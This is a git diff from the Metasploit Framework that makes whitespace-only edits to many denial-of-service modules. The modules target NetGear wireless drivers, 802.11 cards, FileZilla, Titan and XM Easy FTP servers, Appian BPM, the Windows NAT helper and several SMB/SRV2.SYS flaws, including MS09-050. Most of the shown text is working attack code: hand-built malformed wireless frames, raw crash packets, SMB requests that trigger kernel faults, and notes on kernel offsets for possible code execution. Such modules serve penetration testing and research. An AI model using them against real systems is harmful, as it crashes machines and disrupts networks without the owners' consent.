Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -17,25 +17,25 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow', 'Description' => %q{ This module exploits a buffer overflow in the NetGear MA521 wireless device driver under Windows XP. When a specific malformed frame (beacon or probe response) - is received by the wireless interface under active scanning mode, the MA521nd5.SYS + is received by the wireless interface under active scanning mode, the MA521nd5.SYS driver attempts to write to an attacker-controlled memory location. The vulnerability is triggered by an invalid supported rates information element. - - This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a + + This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a NetGear MA521 Cardbus adapter. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation + with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. }, - + 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module 'License' => MSF_LICENSE, 'References' => @@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary ['OSVDB', '30507'], ['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'], ['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip'] - ] + ] )) register_options( [ OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']) - ], self.class) + ], self.class) end def run 
@@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary ssid = Rex::Text.rand_text(6) bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') - - frame = + + frame = "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x01\x00" + # capabilities @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary # channel IE "\x03" + "\x01" + channel.chr - + return frame end diff --git a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb index d98d792634..6384db1961 100644 --- a/modules/auxiliary/dos/wifi/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wifi/netgear_wg311pci.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -17,39 +17,39 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow', 'Description' => %q{ This module exploits a buffer overflow in the NetGear WG311v1 wireless device driver under Windows XP and 2000. A kernel-mode heap overflow occurs when malformed probe response frame is received that contains a long SSID field - - This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a + + This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI card. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform - with a supported wireless card. Please see the Ruby Lorcon2 documentation + with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. - + }, - + 'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2006-6125'], ['OSVDB', '30511'], - ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'], + ['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'], ['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'], - ] + ] )) register_options( [ OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) + ], self.class) end def run 
@@ -78,15 +78,15 @@ class Metasploit3 < Msf::Auxiliary def create_probe_response bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') - - frame = + + frame = "\x50" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x01\x00" + # capabilities @@ -99,10 +99,10 @@ class Metasploit3 < Msf::Auxiliary # channel IE "\x03" + "\x01" + channel.chr - + return frame - end + end end =begin diff --git a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb index cf0d928f48..60895ec21a 100644 --- a/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb +++ b/modules/auxiliary/dos/wifi/probe_resp_null_ssid.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -19,40 +19,40 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response', 'Description' => %q{ - This module exploits a firmware-level vulnerability in a variety of + This module exploits a firmware-level vulnerability in a variety of 802.11b devices. This attack works by sending a probe response frame containing a NULL SSID information element to an affected device. This - flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, + flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere, Orinoco, and the first generation of Airport cards). }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'], - ['WVE', '2006-0064'] + ['WVE', '2006-0064'] ] )) register_options( [ OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) - ], self.class) + ], self.class) end def run open_wifi - + cnt = datastore['COUNT'].to_i - print_status("Creating malicious probe response frame...") + print_status("Creating malicious probe response frame...") frame = create_frame() - + print_status("Sending #{cnt} frames...") cnt.times { wifi.write(frame) } end @@ -61,21 +61,21 @@ class Metasploit3 < Msf::Auxiliary bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') caps = [rand(65535)].pack('n') - - frame = + + frame = "\x50" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value Rex::Text.rand_text(2) + # beacon interval Rex::Text.rand_text(2) + # capabilities [0, 0].pack('CC') # Type=SSID(0) Length=0 - + return frame - end + end end 
diff --git a/modules/auxiliary/dos/wifi/wifun.rb b/modules/auxiliary/dos/wifi/wifun.rb index 6886012078..d83a342fd4 100644 --- a/modules/auxiliary/dos/wifi/wifun.rb +++ b/modules/auxiliary/dos/wifi/wifun.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Wireless Test Module', 'Description' => %q{ This module is a test of the wireless packet injection system. Please see external/ruby-lorcon/README for more information. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$' - )) + )) end def run diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index 6292d60c8e..95359c6c79 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -17,15 +17,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Appian Enterprise Business Suite 5.6 SP1 DoS', 'Description' => %q{ This module exploits a denial of service flaw in the Appian - Enterprise Business Suite service. + Enterprise Business Suite service. }, - + 'Author' => [ 'guiness.stout ' ], 'License' => BSD_LICENSE, 'Version' => '$Revision$', @@ -37,17 +37,17 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Dec 17 2007' )) - + register_options([Opt::RPORT(5400),], self.class) end def run print_status('Connecting to the service...') connect - + # mod: randomize the static "saint" strings from the PoC - hdm - - req = + + req = "\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00" + @@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary "\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33"+ "\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00"+ "\x00" - + print_status('Sending exploit...') sock.put(req) - + disconnect end diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index e54b9c0d5a..c20bd39baa 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' 
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'FileZilla FTP Server Admin Interface Denial of Service', 'Description' => %q{ This module triggers a Denial of Service condition in the FileZilla FTP diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index 3b9056eb31..b77bae83b3 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service', 'Description' => %q{ This module triggers a Denial of Service condition in the FileZilla FTP diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb index 42977bcfe7..8a63bcf615 100644 --- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb 
@@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS', 'Description' => %q{ The Titan FTP server v6.26 build 630 can be DoS'd by diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb index 91a8319407..127b76238d 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'XM Easy Personal FTP Server 5.6.0 NLST DoS', 'Description' => %q{ This module is a port of shinnai's script. You need diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb index ca01e6061d..9753a6cee6 100644 --- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb 
+++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'XM Easy Personal FTP Server 5.7.0 NLST DoS', 'Description' => %q{ You need a valid login to DoS this FTP server, but diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index c190ab6bdb..6507201f8c 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,14 +17,14 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Windows NAT Helper Denial of Service', 'Description' => %q{ This module exploits a denial of service vulnerability - within the Internet Connection Sharing service in - Windows XP. + within the Internet Connection Sharing service in + Windows XP. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2006-5614' ], ], 'DisclosureDate' => 'Oct 26 2006')) - + register_options([Opt::RPORT(53),], self.class) end @@ -46,14 +46,15 @@ class Metasploit3 < Msf::Auxiliary pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06" pkt << Rex::Text.rand_text_english(10) + "\x03" - pkt << Rex::Text.rand_text_english(3) + pkt << Rex::Text.rand_text_english(3) pkt << "\x00\x00\x01\x00\x01" - + print_status("Sending dos packet...") - + udp_sock.put(pkt) - + disconnect_udp end end + diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 82eb414374..fac8922022 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -15,22 +15,22 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Plug and Play Service Registry Overflow', 'Description' => %q{ This module triggers a stack overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. Since the PnP service runs inside the service.exe process, this module - will result in a forced reboot on Windows 2000. Obtaining + will result in a forced reboot on Windows 2000. Obtaining code execution is possible if user-controlled memory can - be placed at 0x00000030, 0x0030005C, or 0x005C005C. + be placed at 0x00000030, 0x0030005C, or 0x005C005C. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -43,12 +43,12 @@ class Metasploit3 < Msf::Auxiliary [ 'OSVDB', '18830' ] ] )) - + register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']), ], self.class) - + end =begin @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary # Determine which pipe to use pipe = datastore['SMBPIPE'] - + print_status("Connecting to the SMB service...") connect() smb_login() @@ -91,12 +91,12 @@ class Metasploit3 < Msf::Auxiliary path = "HTREE\\ROOT" + ("\\" * i) # 0 = nil, 1 = enum, 2/3 = services, 4 = enum (currentcontrolset|caps) - - stubdata = + + stubdata = NDR.long(rand(0xffffffff)) + - NDR.wstring(path) + + NDR.wstring(path) + NDR.long(4) + - NDR.long(1) + + NDR.long(1) + print_status("Calling the vulnerable function...") @@ -111,8 +111,8 @@ class Metasploit3 < Msf::Auxiliary raise e end end - - disconnect + + disconnect end end diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index de3a5be595..1980695e19 100644 
--- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV.SYS Mailslot Write Corruption', 'Description' => %q{ This module triggers a kernel pool corruption bug in SRV.SYS. Each - call to the mailslot write function results in a two byte return value + call to the mailslot write function results in a two byte return value being written into the response packet. The code which creates this packet fails to consider these two bytes in the allocation routine, resulting in - a slow corruption of the kernel memory pool. These two bytes are almost + a slow corruption of the kernel memory pool. These two bytes are almost always set to "\xff\xff" (a short integer with value of -1). }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', @@ -48,12 +48,12 @@ class Metasploit3 < Msf::Auxiliary 'DefaultAction' => 'Attack', 'DisclosureDate' => 'Jul 11 2006' )) - + register_options( [ OptString.new('MAILSLOT', [ true, "The mailslot name to use", 'Alerter']), ], self.class) - + end # MAILSLOT: HydraLsServer @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary case action.name when 'Attack' - + print_status("Mangling the kernel, two bytes at a time..."); connect @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Exception => e - if (i == 1) + if (i == 1) print_status("Failed to write any data to the mailslot: #{e}") break end 
@@ -96,8 +96,8 @@ class Metasploit3 < Msf::Auxiliary # Errors: # 0xc0000034 = object not found - # 0xc0000205 = insufficient resources (too much data) - + # 0xc0000205 = insufficient resources (too much data) + end disconnect diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index ac3131dac8..f2d6f7c16a 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,14 +19,14 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null', 'Description' => %q{ This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system. This bug was independently discovered by CORE Security and ISS. }, - + 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', @@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary ['BID', '19215'], ] )) - + end def run @@ -52,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary 1.upto(5) do |i| print_status("Sending bad SMB transaction request #{i}..."); self.simple.client.trans_nonull( - "\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}", - '', - Rex::Text.rand_text_alphanumeric(rand(16)+1), - 3, - [1,0,1].pack('vvv'), + "\\#{Rex::Text.rand_text_alphanumeric(rand(16)+1)}", + '', + Rex::Text.rand_text_alphanumeric(rand(16)+1), + 3, + [1,0,1].pack('vvv'), true ) end 
diff --git a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb index a1b97287a2..e68e8e7643 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_001_write.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_001_write.rb @@ -1,10 +1,21 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset', 'Description' => %q{ This module exploits a denial of service vulnerability in the @@ -14,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'j.v.vallejo[at]gmail.com' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ ['MSB', 'MS09-001'], ['OSVDB', '48153'], @@ -49,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed pkt['Payload'].v['ShareAccess'] = 7 pkt['Payload'].v['CreateOptions'] = 0x400040 - pkt['Payload'].v['Impersonation'] = 2 + pkt['Payload'].v['Impersonation'] = 2 pkt['Payload'].v['Disposition'] = 1 pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb index 57eae8c0ad..e7cfd719d8 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Dos def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference', 'Description' => %q{ This module exploits an out of bounds function table dereference in the SMB @@ -27,7 +27,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2009-3103'], ['BID', '36299'], @@ -41,13 +41,13 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(445), OptInt.new('OFFSET', [true, 'The function table offset to call', 0xffff]) ], self.class) - + end def run connect() - + # The SMB 2 dialect must be there dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002'] data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('') @@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending request and waiting for a reply...") sock.put(pkt.to_s) r = sock.get_once - + if(not r) print_status("The target system has likely crashed") else print_status("Response received: #{r.inspect}") end - + disconnect() end @@ -95,11 +95,11 @@ end 0x76 = ExAllocatePoolWithTag 0x77 = ExFreePool 0x86 = ExAllocatePoolWithTag - 0x87 = ExFreePoo + 0x87 = ExFreePoo 0x96 = ExAllocatePoolWithTag - 0x97 = ExFreePoo + 0x97 = ExFreePoo 0xa6 = ExAllocatePoolWithTag - 0xa7 = ExFreePoo + 0xa7 = ExFreePoo 0xb9 = BugCheckEx 0xc7 = SrvBalanceCredits 0xdf = SrvNetStatistics data 
@@ -114,10 +114,10 @@ end 0x0179 = SrvProcessOplockBreakTimer 0x0185 = L"XactSrv" 0x01f8 = WppTraceCallback - - + + Offsets on Vista SP1 (no updates) x86: - + 0x64 = mov esp, ebp; pop ebp, ret 0xde = pool with tag @@ -154,6 +154,6 @@ end 734 -> 802015ff - ffde03f078f8ff7f7c02f8ff3ffe01fe 760 -> 99b4ff28 - 8bff558bec6a00ff7514ff7510ff750c 804 -> 830ffc7d - 0000001722268b3e012004020010c01c - + =end diff --git a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb index 9fbaf3f986..e8483499bd 100644 --- a/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb +++ b/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -22,54 +22,54 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference', 'Description' => %q{ - This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing - an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. + This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing + an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050. }, 'Author' => [ 'sf' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-3103'], [ 'OSVDB', '57799' ], [ 'MSB', 'MS09-050' ], ] )) - + register_options( [ Opt::RPORT( 445 ) ], self.class ) end def run print_status( "Targeting host #{datastore['RHOST']}:#{datastore['RPORT']}..." ) connect - + dialects = [ "AAAA" + [ 0xDEADC0DE ].pack( "V" ) + [ 0xCAFEF00D ].pack( "V" ), "SMB 2.002" ] - + data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join( '' ) data += "A" * 128 - + packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct - + packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE packet['Payload']['SMB'].v['Flags1'] = 0x18 packet['Payload']['SMB'].v['Flags2'] = 0xC853 packet['Payload']['SMB'].v['ProcessIDHigh'] = Rex::Proto::SMB::Constants::SMB2_OP_LOGOFF packet['Payload'].v['Payload'] = data - + packet = packet.to_s - + print_status( "Sending the exploit packet (#{packet.length} bytes)..." ) sock.put( packet ) - + response = sock.get_once - + if( not response ) print_status( "No response. The target system has probably crashed." ) else print_status( "Response received. The target system is not vulnerable:\n#{response.inspect}" ) end - + disconnect end 
